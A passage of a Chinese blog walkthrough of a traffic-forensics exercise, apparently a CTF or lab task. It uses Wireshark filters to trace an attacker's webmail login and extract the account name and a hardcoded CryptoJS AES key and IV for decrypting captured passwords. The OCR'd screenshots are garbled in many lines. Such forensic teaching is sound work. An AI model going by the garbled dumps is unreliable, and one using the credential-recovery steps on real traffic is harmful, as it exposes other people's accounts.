|                                                                     |                                                                                            | 滤掉此流                                                                                                    | 打印                                                                                                    | Save                                                                 | as                                                              | 返回                                                                                   | CSD                                                          |                                    | ohikata        | /.G   |

通过上图得出三个网卡的结果,通过分析,一直向黑客IP 192.168.94.59 回复黑客消息的都是IP 192.168.32.189,因此可以判 定此IP为外网IP,而 etho 就是外网网卡,另外 lo 为环回地址,这个大家都知道,所以剩下的 eth1 为内网网卡, 而 10.3.3.100 就是内网IP了。

### 10、黑客登陆了mail系统所使用的账号和密码(形式: username/password)

只有一题有关 mail,因此毋庸置疑,需要综合查询两个有关 mail的流量包。 根据题目要求,决定使用 mail 作为关键字进行过滤;另外从常识可知mail登录是通过表单提交的,一般提交账号和密码为了安 全性,都是使用 POST 关键字。

http.request.method==POST && http contains "mail"

| mailtwo.pcap                                                                                                    | - 0 ×                                           | <   |
|----------------------------------------------------------------------------------------------------|-------------------------------------------------|-----|
|                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
| Attp.request.method=PtOI 00 http contains mail                                                                                     | (二) * (私区式)**                                   | +   |
| No. Time Source Bettination Protocol Langth Info                                                                                   |                                                 | ^   |
| + 21/ 31.094931 192.168 HIP 945 POST (webmail/index.php?module=operate&action=login&web=1 HIP/1.1 (application/x-www-torn          | m-uriencoded)                                   | -   |
| 7/2 75.963251 192.168 192.168 HIP 825 POSI /webmail/index.php?module=operate&action=login&web=1 HIP/1.1 (application/x-www-form    | m-urlencoded)                                   |     |
| 3140 372.800302 192.168 192.168 HTTP 852 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-for | m-urlencoded)                                   |     |
| 3151 373.837428 192.168 192.168 HTTP 724 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-for | m-urlencoded)                                   |     |
| 3969 404.111975 192.168 192.168 HTTP 1547 POST /webmail/module/mail/index.php?module=operate&action=mail-save HTTP/1.1             |                                                 |     |
| 4033 406.053919 192.168 192.168 HTTP 825 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-for | m-urlencoded)                                   |     |
| 4553 424.517858 192.168 192.168 HTTP 646 POST /webmail/module/mail/index.php?module=operate&action=mail-save HTTP/1.1              |                                                 |     |
| 4660 432.616410 192.168 192.168 HTTP 583 POST /webmail/module/mail/index.php?module=operate&action=mail-send HTTP/1.1              |                                                 |     |
| 4957 470.920349 192.168 192.168 HTTP 1123 POST /webmail/module/mail/index.php?module=operate&action=mail-send HTTP/1.1             |                                                 |     |
| 5060 478.115041 192.168 192.168 HTTP 716 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-for | m-urlencoded)                                   |     |
| 5786 533.728319 192.168 192.168 HTTP 1111 POST /webmail/module/mail/index.php?module=operate&action=mail-send HTTP/1.1             |                                                 |     |
|                                                                                                    |                                                 |     |
| > Frame 21/: 945 bytes on wire (/560 bits), 945 bytes captured (/560 bits)                                                         |                                                 |     |
| > Ethernet 11, SrC: Hangzhou_39:42:ed (b0:H9:65:39:42:ed), DS:T: VMWare_2d:e4:66 (00:00:29:2d:e4:66)                               |                                                 |     |
| > Internet Protocol Version 4, Src: 192.168.94.131, UST: 192.168.32.187                                                            |                                                 |     |
| > Iransmission Control Protocol, Src Port: 55953, Dst Port: 80, Seq: 592, Ack: 320, Len: 891                                       |                                                 | -   |
| > Hypertext Transfer Protocol                                                                                                    |                                                 |     |
| HIML Form UKL Encoded: application/x-www-form-urlencoded                                                                           |                                                 |     |
| > Form item: "username" = "wenwenni"                                                                                               |                                                 |     |
| > Form item: "domain" = "test.com"                                                                                                 |                                                 |     |
| > Form item: "password" = "3oUuaEG4ux6xKD3RZ1iSew=="                                                                               |                                                 |     |
| > Form item: "language" = "zh_CN"                                                                                                  |                                                 |     |
| > Form item: "remuser" = "1"                                                                                                    |                                                 |     |
| > Form item: "enter" = "true"                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
|                                                                                                    |                                                 |     |
| 0000 00 0c 29 2d e4 66 b0 f9 63 39 42 ed 08 00 45 00 ·······E·                                                                     |                                                 | ^   |
| 0010 03 a3 64 f2 40 00 7f 0€ 92 d3 c0 a8 5e 83 c0 a8 · · · d·@· · • · · · · ·                                                      |                                                 |     |
| 0020 20 bb da 91 00 50 4c 96 8b 83 1c 03 99 +5 50 18PLP.                                                                           |                                                 |     |
| 0030 3f d8 69 a4 00 00 50 4f 53 54 20 2f 77 65 62 6d 2.1PO ST /webm                                                                |                                                 |     |
| 0040 61 69 6c 2f 69 6e 64 65 78 2e 70 68 70 3f 6d 6f ail/inde x.php?mo                                                             |                                                 |     |
| 0050 64 /5 6c 65 3d 6f /0 65 /2 61 /4 65 26 61 63 /4 dule=ppe rate&act                                                             |                                                 |     |
|                                                                                                    |                                                 |     |
| 000 40 54 54 50 27 51 28 51 00 00 40 07 75 74 50 20 mil/fill - nost:                                                               |                                                 |     |
| 000 31 35 32 22 31 30 38 22 53 32 22 31 30 37 00 00 192.100, 32.107 **                                                             |                                                 |     |
| 20 61 6c 69 76 65 70 8a 43 6f 67 74 65 6e 74 2d - alive-: Content-                                                                 |                                                 |     |
| 00b0 4c 65 6e 67 74 68 3a 20 31 30 37 0d 0a 43 61 63 Length: 107 (ac                                                               |                                                 |     |
| 00c0 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d he-Contr ol: max-                                                             |                                                 |     |
| 00d0 61 67 65 3d 30 0d 0a 4f 72 69 67 69 6e 3a 20 68 age=00 rigin: h                                                               |                                                 |     |
| 00e0 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 33 32 ttp://19 2.168.32                                                             |                                                 |     |
| 00f0 2e 31 38 37 0d 0a 55 70 67 72 61 64 65 2d 49 6e .187 Up grade-In                                                              |                                                 |     |
| 0100 73 65 63 75 72 65 2d 52 65 71 75 65 73 74 73 3a secure-R equests:                                                             | CODI-Girbourd                                   | ~   |
| 🕒 🍸 mailteo.poap                                                                                                    | 分组: 418303 ・ 已显示: 11891 (2.8%) しちじい ピリ 調査: Defe | ült |
|                                                                                                    |                                                 |     |

从上图可知,发现很多登录的流量,打开流量查看可以发现尝试的密码很像 base64,但 base64 是编码格式,不是加密,因此考虑的这方面类似加密结果的加密方式,只有一种可能,那就是AES加密。那么,如果是AES加密,就需要找到对应的key和iv偏移量。

此时,还是需要再次重新过滤流量,获取新的信息,那么就继续过滤 http 的流量,同时加上状态码为 200 的过滤关键字。

http.response.code==200

| a mailtwo.pcap                                                                                                    |                                | – 🗆 ×          |
|----------------------------------------------------------------------------------------------------|--------------------------------|----------------|
| 文件(F) 編輯(E) 视图(V) 跳转(G) 捕获(C) 分析(A) 统计(S) 电话(Y) 无线(W) 工具(T) 帮助(H)                                                                            |                                |                |
| 📶 🔲 🍠 🕒 🔁 🔁 🗣 👄 🕾 🖉 🗮 📃 🔍 Q. Q. Q. X.                                                                                                    |                                |                |
| http:/response.code=200                                                                                                    |                                | 🛛 ➡ ▼ 表达式… +   |
| No. Time Source Destination Protocol Length Info                                                                                             |                                | ^              |
| - 35 4.702228 192.168 192.168 HTTP 59 HTTP/1.1 200 0K (text/html)                                                                            |                                |                |
| 44 6.048428 192.168 192.168 HTTP 368 HTTP/1.1 200 0K (text/html)                                                                             |                                |                |
| 49 6.336430 192.168 192.168 HTTP 373 HTTP/1.1 200 0K (text/html)                                                                             |                                |                |
| 224 31.215697 192.168 192.168 HTTP 1148 HTTP/1.1 200 0K (text/html)                                                                          |                                |                |
| 279 31.815254 192.168 192.168 HTP 859 HTP/1.1 200 0K (text/html)                                                                             |                                |                |
| 296 31.998702 192.168 192.168 HTP 1053 HTP/1.1 200 0K (text/html)                                                                            |                                |                |
| 301 32.037516 192.168 192.168 HTP 549 HTTP/1.1 200 0K (text/html)                                                                            |                                |                |
| 366 32 071282 192 168 192 168 HTTP 382 HTTP/1 1 200 ((ctrat/html))                                                                           |                                |                |
| 318 32 117997 192 168 192 168 HTTP 59 HTTP/1 2 00 0 ((text/html)                                                                             |                                |                |
| 333 32 439167 192 168 192 168 HTTP 463 HTTP/1 200 00 ((text/html)                                                                            |                                |                |
| 334 35 47566 192 158 192 158 HTTP 1455 HTTP/11 200 K (cert/itma)                                                                             |                                |                |
| MA 57 57 57 500 101 40 40 40 40 100 100 100 100 100 1                                                                                        |                                | ~              |
| \n                                                                                                    |                                | ^              |
| var loginCheck = function(form) {\n                                                                                                    |                                |                |
| if(form.username.value == "") {\n                                                                                                    |                                |                |
| alert("\351\202\256\344\273\266\345\270\220\345\217\267\344\270\215\350\203\275\344\270\272\347\251\272\357\274\201");\n                     |                                |                |
| form.username.focus();\n                                                                                                    |                                |                |
| return false;\n                                                                                                    |                                |                |
| }\n                                                                                                    |                                |                |
| if(form.password.value == "") {\n                                                                                                    |                                |                |
| alert("\347\231\273\345\275\225\345\275\226\347\240\201\344\270\215\350\203\275\344\270\272\357\274\201"):\n                                 |                                |                |
| form.password.focus():\n                                                                                                    |                                |                |
| peturn false:\n                                                                                                    |                                |                |
|                                                                                                    |                                |                |
| \t\n                                                                                                    |                                |                |
| \t\\\ran key hash = CryntolS_MD5('1234567812345678').\n                                                                                      |                                |                |
| thit was be constant ansafew hash in                                                                                                    |                                |                |
| thitten is a press and the page (123/55/8123/55/81) in                                                                                       |                                |                |
| \t\\form nessword value = (rvntolS AFS encrynt/form nessword value key { iv: iv mode:(rvntolS mode (RC nadding:(rvntolS nad ZeroPadding)):)n |                                |                |
| <                                                                                                    |                                | >              |
| 23d0 61 73 68 29 3b 0a 09 09 76 61 72 20 69 76 20 ash): ···· var iv                                                                          |                                | ^              |
| 23e0 20 3d 20 43 72 79 70 74 6f 4a 53 2e 65 6e 63 2e = Crypt o35.enc.                                                                        |                                |                |
| 23f0 55 74 66 38 2e 70 61 72 73 65 28 27 31 32 33 34 Utf8.par se(*1234                                                                       |                                |                |
| 2400 35 36 37 38 31 32 33 34 35 36 37 38 27 29 3b 0a 56781234 5678');·                                                                       |                                |                |
| 2410 09 09 09 66 6f 72 6d 2e 70 61 73 73 77 6f 72 6d ···form. password                                                                       |                                |                |
| 2420 2e 76 61 6c 75 65 20 3d 20 43 72 79 70 74 6f 4a .value = Cryptol                                                                        |                                |                |
| 2430 53 2e 41 45 53 2e 65 6e 63 72 79 70 74 28 66 6f S.AES.en crypt(fo                                                                       |                                |                |
| 2440 72 6d 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 mm.passw ord.valu                                                                       |                                |                |
| 2450 65 2c 20 6b 65 79 2c 20 7b 20 69 76 3a 20 69 76 e, key, { iv: iv                                                                        |                                |                |
| 2460 2c 6d 6f 64 65 3a 43 72 79 70 74 6f 4a 53 2e 6d ,mode:Cr yptoJS.m                                                                       |                                |                |
| 24/0 6f 64 65 2e 43 42 43 2c /0 61 64 64 69 6e 6/ 3a ode.CBC, padding:                                                                       |                                |                |
| 2480 43 /2 /9 /8 /4 bt 4a 53 /2 / 8 bt 64 /2 5a 65 /2 (ryptols, pad./en                                                                      |                                |                |
| 2490 bt 50 bl 64 64 69 be b/ 70 29 30 88 99 99 70 88 0P3001g };                                                                              |                                |                |
|                                                                                                    |                                |                |
|                                                                                                    |                                |                |
| Frame (59 bytes) Reassabled TCF (10621 bytes) De-chunked entity body (10296 bytes)                                                           |                                |                |
| ● 🗭 Text item (text), 58 字节                                                                                                    | 分组: 418303 · 已昂示: 16805 (4.0%) | CSDN @Jonnny G |
|                                                                                                    |                                | Press.         |

从上图中发现,我们随机打开一个流量,查看里面的信息,可以看到里面有我们需要的key和iv偏移量。

MD5加密后的key: var key\_hash = CryptoJS.MD5('1234567812345678');

key: var key = CryptoJS.enc.Utf8.parse(key\_hash);

iv偏移量: var iv = CryptoJS.enc.Utf8.parse('1234567812345678');

#### 紧接着尝试过滤 http

|                                                                                                    | - <b>a</b> ×                                |
|----------------------------------------------------------------------------------------------------|---------------------------------------------|
| ■ Instituto,peap                                                                                                    | <b>D</b> 7                                  |
|                                                                                                    |                                             |
|                                                                                                    |                                             |
| Attp                                                                                                    |                                             |
| No. Time Source Destination Protocol Length Info                                                                                                    | ^                                           |
| * 32.2581/8 192.168 192.168 HIP 680 GET /webmai/index.php?module=operate&action=logout HIP/1.1                                                                                                    |                                             |
| - 5 2.300323 192.168 11P 455 H11P/1.1 302 Found (text/html)                                                                                                    |                                             |
| 103.515169 192.108 202.103 HTTP /15 POST / 50 POST / 50 POST | coded)                                      |
| 11.5.344250 202.105 192.106 nife 345 nife/iii 301 moved vermanentity (text/num1)                                                                                                    |                                             |
| 20 5.500010 192.100 202.105 niir / 15 r051 / 50 ammeso1/errws/spameso1/errws.air/conewequest niir/1.1 (dpp1/cdi.D01/x-www-rorm-urlen                                                                                                    | coded)                                      |
| * 20 + 0.00009 192-100 192-100 ITT                                                                                                    |                                             |
| 25 4.702220 192.100 192.100 197.100 117 55 FTT / Jabo (CECK/TELL)                                                                                                    |                                             |
| 42 0.012445 192.100 192.100 197.100 101 300 CL ( WEDWIGHT / 1002.1011001.1002.1002.0000.0000.000                                                                                                    |                                             |
| 49 0.00020 122.100 122.100 11 5.100 11 5.100 11 5.00 0K (EKC/ILLI)                                                                                                    |                                             |
| 49 6 33638 192 168 192 188 HTTP 373 HTTP/1 200 K (fayt/html)                                                                                                    |                                             |
|                                                                                                    | - L N                                       |
| Request Version: HTTP/1.1                                                                                                    | ^                                           |
| Host: 192.168.32.187\r\n                                                                                                    |                                             |
| Connection: keep-alive\r\n                                                                                                    |                                             |
| Upgrade-Insecure-Requests: 1\r\n                                                                                                    |                                             |
| User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36\r\n                                                                                                    |                                             |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n                                                                                                    |                                             |
| Referer: http://192.168.32.187/webmail/index.php\r\n                                                                                                    |                                             |
| Accept-Encoding: gzip, deflate\n\n                                                                                                    |                                             |
| Accept-Language: zh-CN,zh;q=0.9\r\n                                                                                                    |                                             |
| Cookie: login_domain=test.com; PHPSESSID=csm2kh9f3kjqsft1n17ft7dk95; SL_G_WPT_TO=zh-CN; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1; login_name                                                                                                    | wenwenni\r\n                                |
| Cookie pair: login_domain=test.com                                                                                                    |                                             |
| Cookie pair: PHPSESSID=csm2kh9f3kjqsft1n17ft7dk95                                                                                                    |                                             |
| Cookie pair: SL_G_WPT_TO=zh-CN                                                                                                    |                                             |
| Cookie pair: SL_GWPT_Show_Hide_tmp=1                                                                                                    |                                             |
| Cookie pair: SL_wptGloblipTmp=1                                                                                                    |                                             |
| Cookie pair: login_name=wenwenni                                                                                                    |                                             |
|                                                                                                    |                                             |
| L FULL REQUEST UKL: DTTD:///YY.1bX.32.18//WPDMB11/100PX.DDD?MODULE=DPPCATEWACTION=LOPOUTL                                                                                                    |                                             |
|                                                                                                    |                                             |
| 0020 02 Ja 06 70 07 00 59 04 00 59 04 05 05 00 00 00 00 00 00 00 00 00 00 00                                                                                                    |                                             |
| 0030 3f 47 b4 b7 00 00 47 45 54 20 2f 77 65 62 6d 61 2G. GET /webma                                                                                                    |                                             |
| 0040 69 6c 2f 69 6e 64 65 78 2e 70 68 70 3f 6d 6f 64 il/index .php?mod                                                                                                    |                                             |
| 0050 75 6c 65 3d 6f 70 65 72 61 74 65 26 61 63 74 69 ule=oper ate&acti                                                                                                    |                                             |
| 0060 6f 6e 3d 6c 6f 67 6f 75 74 20 48 54 50 2f 31 on=logou t HTTP/1                                                                                                    |                                             |
| 0070 2e 31 0d 0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 .1. Host : 192.16                                                                                                    |                                             |
| 0000 38 2e 33 32 2e 31 38 37 00 08 43 bt be be bb b3 8.32/187 ··Connec                                                                                                    |                                             |
|                                                                                                    |                                             |
| 00b0 72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a re-Reque sts: 1.                                                                                                    |                                             |
| 00c0 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Age nt: Mozi                                                                                                    |                                             |
| 00d0 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 11a/5.0 (Windows                                                                                                    |                                             |
| 00e0 20 4e 54 20 36 2e 31 3b 20 57 4f 57 36 34 29 20 NT 6.1; WOW64)                                                                                                    |                                             |
| 0010 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e AppleWeb Kit/537.                                                                                                    |                                             |
| 23 35 20 28 40 48 54 4a 4c 2c 20 6c 69 6b 65 20 36 (KHIM L, like                                                                                                    | CSDN @Johnny.G                              |
| malityc.pcsp                                                                                                    | 対視: 416303 ・ 已発示: 160503(38,4%) 翻書: Default |

通过上图发现,过滤 http 后中的第一个流量就是服务器获取的登录表单信息,同时呢,这个流量中有一个 logout 的关键字,说 明是刚刚退出登录,加入里面有账号信息,那么这就是登录 mail 的账号,那么,查看里面的信息发现在Cookie里面有登录 mail 的账号: wenwenni。

当我们知道 mail 的账号是 wenwenni, 那么后面就需要查询账号是 wenwenni 的情况下登陆成功后所返回的值,这样才有机会通 过关键字过滤, 从而查询出对应的正确登录密码。

因此,通过账号为 wenwenni 和状态码为 200 作为过滤关键字进行再次过滤

http contains "wenwenni" or http contains 200

| a mailtwo.pcap                                                                                                    |                                | - D X                                                                                                    |
|----------------------------------------------------------------------------------------------------|--------------------------------|----------------------------------------------------------------------------------------------------|
| 文件(F) 編輯(E) 视图(V) 跳秧(G) 捕获(C) 分析(A) 统计(S) 电话(V) 无线(W) 工具(T) 鞣助(H)                                                                                                    |                                |                                                                                                    |
| 📶 📰 🖉 🐵 📘 🖻 🕱 🐵 🕸 😨 🕸 🕎 🗮 🔍 Q. Q. A. A                                                                                                    |                                |                                                                                                    |
| http contains "wenwenni" or http contains 200                                                                                                    |                                | ▲ 🖘 表达式… 🕇                                                                                                    |
| No. Time Source Destination Protocol Length Info                                                                                                    |                                | ^                                                                                                    |
| ☐ 3 2.258178 192.168 192.168 HTTP 680 GET /webmail/index.php?module=operate&action=logout HTTP/1.1                                                                                                    |                                |                                                                                                    |
| 28 4.656359 192.168 192.168 HTTP 676 GET /webmail/index.php?module=view&action=login HTTP/1.1                                                                                                    |                                |                                                                                                    |
| 35 4.702228 192.168 192.168 HTTP 59 HTTP/1.1 200 OK (text/html)                                                                                                    |                                |                                                                                                    |
| 42 6.012645 192.168 192.168 HTTP 658 GET /webmail/index.php?module=view&action=login&mode=browser&width=1366&height=768 HTTP/1.1                                                                                                    |                                |                                                                                                    |
| 44 6.048428 192.168 192.168 HTTP 368 HTTP/1.1 200 OK (text/html)                                                                                                    |                                |                                                                                                    |
| 47 6.301315 192.168 192.168 HTTP 645 GET /webmail/index.php?module=operate&action=checkss1&domain=test.com HTTP/1.1                                                                                                    |                                |                                                                                                    |
| 49 6.336430 192.168 192.168 HTTP 373 HTTP/1.1 200 OK (text/html)                                                                                                    |                                |                                                                                                    |
| 217 31.094931 192.168 192.168 HTTP 945 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)                                                                                                    |                                |                                                                                                    |
| 219 31.135365 192.168 192.168 HTTP 577 HTTP/1.1 302 Found (text/html)                                                                                                    |                                |                                                                                                    |
| 220 31.175161 192.168 192.168 HTTP 702 GET /webmail/index.php HTTP/1.1                                                                                                    |                                |                                                                                                    |
| 224 31.215697 192.168 192.168 HTTP 1148 HTTP/1.1 200 0K (text/html)                                                                                                    |                                |                                                                                                    |
|                                                                                                    |                                |                                                                                                    |
| [content length: 16]                                                                                                    |                                |                                                                                                    |
| Connection: Rep-alive (r/n                                                                                                    |                                |                                                                                                    |
| Explores: Huy 19 Hov 1961 00:32:00 GHI (17)1                                                                                                    |                                |                                                                                                    |
| Cache-Control: no-Score, no-Cache, must-revaluate, post-check=0, pre-check=0/r\n<br>Posone: po. cscholvlo                                                                                                    |                                |                                                                                                    |
| ringging, no-cache(r)(n                                                                                                    |                                |                                                                                                    |
| V:VI<br>[HTTD personne 3/10]                                                                                                    |                                |                                                                                                    |
| [Time response 5/20]<br>[Time since neurost: 0.035783000 seconds]                                                                                                    |                                |                                                                                                    |
| [Phase same request. or oppositions]                                                                                                    |                                |                                                                                                    |
| Interreport an informer asi                                                                                                    |                                |                                                                                                    |
| [Request in frome. 42]                                                                                                    |                                |                                                                                                    |
| Insurance and the main test                                                                                                    |                                |                                                                                                    |
| Inset records in frame: 201                                                                                                    |                                |                                                                                                    |
| Instant Control and Control and Control an |                                |                                                                                                    |
| File Data: 16 hytes                                                                                                    |                                |                                                                                                    |
| <pre>v line-hased text data: text/html (1 lines)</pre>                                                                                                    |                                |                                                                                                    |
| {"success":thue}                                                                                                    |                                |                                                                                                    |
|                                                                                                    |                                | ~                                                                                                    |
| 0070 31 38 20 30 36 3a 33 34 3a 34 30 20 47 4d 54 0d 18 06:34 :40 GMT                                                                                                    |                                | ^                                                                                                    |
| 0080 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 ·Content -Type: t                                                                                                    |                                |                                                                                                    |
| 0090 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 ext/html; charse                                                                                                    |                                |                                                                                                    |
| 00a0 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 t=utf-8· Content                                                                                                    |                                |                                                                                                    |
| 00b0 2d 4c 65 6e 67 74 68 3a 20 31 36 0d 0a 43 6f 6e -Length: 16Con                                                                                                    |                                |                                                                                                    |
| Vecco be b5 b5 /4 b9 bf be 3a 20 bb b5 b5 /0 2d b1 bc nection: Keep-al                                                                                                    |                                |                                                                                                    |
| 0000 05 / 0 05 00 08 45 / 0 / 0 09 / 2 05 / 5 38 20 54 00 IVE* CRD ITES: IN                                                                                                    |                                |                                                                                                    |
| 0440 33 3a 35 32 3a 30 30 20 47 4d 54 0a 43 61 53 120 50 13 120 50 10 0 0ML (ar                                                                                                    |                                |                                                                                                    |
| 0100 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 he-Contr ol: no-s                                                                                                    |                                |                                                                                                    |
| 0110 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 tore, no -cache,                                                                                                    |                                |                                                                                                    |
| 0120 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c must-rev alidate,                                                                                                    |                                |                                                                                                    |
| 0130 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 post-ch eck=0, p                                                                                                    |                                |                                                                                                    |
| 0140 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 50 72 61 67 re-check =0. Prag                                                                                                    |                                |                                                                                                    |
|                                                                                                    |                                |                                                                                                    |
| 010 22 75 75 65 65 75 75 22 38 74 72 75 57 78 { Succes s :(fue)                                                                                                    |                                |                                                                                                    |
| ● 7 Inst iten (text). 16 辛労                                                                                                    | 分组: 418303 · 已第示: 21806 (5.2%) | CSDN @Jakiny.G.                                                                                                    |
|                                                                                                    |                                | and the second second se |

从上图可以看出此流量为某个成功登录后所返回的值,编号为44,那么接下来就是再看看这个流量的前一个流量是什么。

| 📕 mailtwo.pcap                                                                                                    |                                | - 0      | ×          |
|----------------------------------------------------------------------------------------------------|--------------------------------|----------|------------|
| 文件(F) 編輯(E) 规则(V) 2014年(G) 捕获(C) 分析(A) 統計(S) 电活(V) 无线(W) 工具(T) 帮助(H)                                                                                         |                                |          |            |
|                                                                                                    |                                |          |            |
| http contains "venwenzi" or http contains 200                                                                                                    |                                |          | :式… +      |
| No. Time Source Destination Protocol Length Info                                                                                                    |                                |          | ^          |
| 3 2.258178 192.168 192.168 HTTP 680 GET /webmail/index.php?module=operate&action=logout HTTP/1.1                                                             |                                |          |            |
| 28 4.656359 192.168 192.168 HTTP 676 GET /webmail/index.php?module=view&action=login HTTP/1.1                                                                |                                |          |            |
| 35 4.702228 192.168 192.168 HTTP 59 HTTP/1.1 200 0K (text/html)                                                                                              |                                |          |            |
| ++ 42.6.012645 192.168 192.168 HIIP 658 GET /webmail/index.php?module=view&action=login&mode=browser&width=1366&height=/68 HIIP/1.1                          |                                |          |            |
| 4 44.5.4948426 192.168 192.168 HIP 508 HIP/1.1 200 0K (TeXT/NTM)                                                                                             |                                |          |            |
| 4/ 5.30135 192.168 192.168 HIP 645 GET / WeeDMail/Landex.ppp/module=operate&action=cneckss1&domain=test.com HIP/1.1                                          |                                |          |            |
| 470.50490 192.100 192.100 1117 5/5 1117/1.1 200 04 (LEX/1011)                                                                                                |                                |          |            |
| 21/31/034931 132:100 192:100 117 949 rost /webmail/linex.php:module-operatexaction-rogineweb-1 mir/111 (application/x-www-form-orienteded)                   |                                |          |            |
| 220 31 175161 192 168 192 168 HTTP 702 GFT / upbmail / index nhn HTTP / 1                                                                                    |                                |          |            |
| 224 31-21569 192-168 HTTP 1148 HTTP/1.1 200 0K (fext/html)                                                                                                   |                                |          |            |
| A NATEL                                                                                                    |                                |          | ×          |
| User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36\r\n                                 |                                |          | ^          |
| Referer: http://192.168.32.187/webmail/index.php?module=view&action=login\r\n                                                                                |                                |          |            |
| Accept-Encoding: gzip, deflate\r\n                                                                                                    |                                |          |            |
| Accept-Language: zh-CN,zh;q=0.9\r\n                                                                                                    |                                |          |            |
| Cookie: login_domain=test.com; PHPSESSID=csm2kh9f3kjqsftln17ft7dk95; SL_G_WPT_T0=zh-CN; SL_GWPT_Show_Hide_tmp=1; SL_wptGlobTipTmp=1; login_name=wenwenni\r\n |                                |          |            |
| Cookie pair: login_domain=test.com                                                                                                    |                                |          |            |
| Cookie pair: PHP5ESSID=csm2kh9f3kjqs+tln1/tt/dk95                                                                                                    |                                |          |            |
|                                                                                                    |                                |          |            |
| Cookie pair: SL_WM/_SNOW_HIGE_TMP=1                                                                                                    |                                |          |            |
|                                                                                                    |                                |          |            |
| COOKIE PAIN: IORIN HAIME-Wernwenni                                                                                                    |                                |          |            |
| V.VV<br>[Eu]] naguest URT: http://192.168.32.187/webmail/index.php?modulawview&artion=login@modeshnowcan&width=13668hainh=768]                               |                                |          |            |
| [HTP request 3/10]                                                                                                    |                                |          |            |
| [Prev request in frame: 28]                                                                                                    |                                |          |            |
| Response in frame: 44                                                                                                    |                                |          |            |
| [Next request in frame: 295]                                                                                                    |                                |          |            |
|                                                                                                    |                                |          | ~          |
| 0000 00 0c 29 2d e4 66 b0 f9 63 39 42 ed 08 00 45 00 ······························                                                                          |                                |          | ^          |
| 0010 02 84 63 24 40 00 7f 06 95 c0 c0 a8 5e 83 c0 a8 ···\$€·····^···                                                                                         |                                |          |            |
| 2020 20 bb da 92 00 50 df 48 8c d0 53 d7 a5 2f 50 18P.HS/P.                                                                                                  |                                |          |            |
| 40 27 d1 fd 00 00 47 45 54 20 2f 77 65 62 6d 61 @ ···· €E T /webma                                                                                           |                                |          |            |
| 0040 09 00 2 7 09 00 04 05 70 20 00 70 57 00 07 05 01 00 10 4 11/11002X JPhysmol                                                                             |                                |          |            |
| 2050 6 6 67 69 69 26 6d 6f 46 53 d 62 72 6f 77 73 loging debrows                                                                                             |                                |          |            |
| 0070 65 72 26 77 69 64 74 68 3d 31 33 36 36 26 68 65 er&width =1366&he                                                                                       |                                |          |            |
| 0080 69 67 68 74 3d 37 36 38 20 48 54 54 50 2f 31 2e ight=768 HTTP/1.                                                                                        |                                |          |            |
| 0090 31 0d 0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 1. Host: 192.168                                                                                        |                                |          |            |
| 2010 2e 33 32 2e 31 38 37 0d 0a 43 6f 6e 6e 65 63 74 .32.187 · Connect                                                                                       |                                |          |            |
|                                                                                                    |                                |          |            |
| 2010 5 5 7 17 5 5 7 17 6 5 4 2 5 7 0 7 6 8 3 2 8 2 1 2 8 0 0 5 5 2 1 - A - A - A - A - A - A - A - A - A -                                                   |                                |          |            |
| 00e0 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 0d 0a XMLHttpR equest                                                                                         |                                |          |            |
| 00f0 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Age nt: Mozi                                                                                       |                                |          |            |
| 0100 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 1la/5.0 (Windows                                                                                        |                                | SDN-@lok | inny.G*    |
| 🕒 🝸 sailtro. pop                                                                                                    | 分组: 418303 · 已显示: 21806 (5.2%) | 87       | h: Default |

从上图中可以看出,编号为42的流量是刚刚查询出的编号44的流量的前一个流量,同时使用的 mail 的登录账号也刚好 是 wenwenni,因此可以得知登陆成功的关键字是 {"success":true}。

接下来,通过所得知的黑客 IP 、提交表单常用的 POST 关键字、以及刚刚得知的登陆成功返回的值,作为我们过滤的关键字进行 过滤。

| a nanwo,pap                                                                                                    | B //          |
|----------------------------------------------------------------------------------------------------|---------------|
| 文件(F) 編織(E) 视聞(V) 跳转(G) 捕获(C) 分析(A) 统计(S) 电话(V) 无线(W) 工具(T) 帮助(H)                                                                                                    |               |
| 🖌 🔲 🖉 🕒 🔄 🔁 🐨 😌 🖉 🖉 💆 🚍 🔳 🔍 Q. Q. Q. 🖽                                                                                                    |               |
| (http contains "{\"success\" true}" or http.request.method="FOST") and ip.addr=192.168.94.59                                                                                                    | ▲ → ★达式… +    |
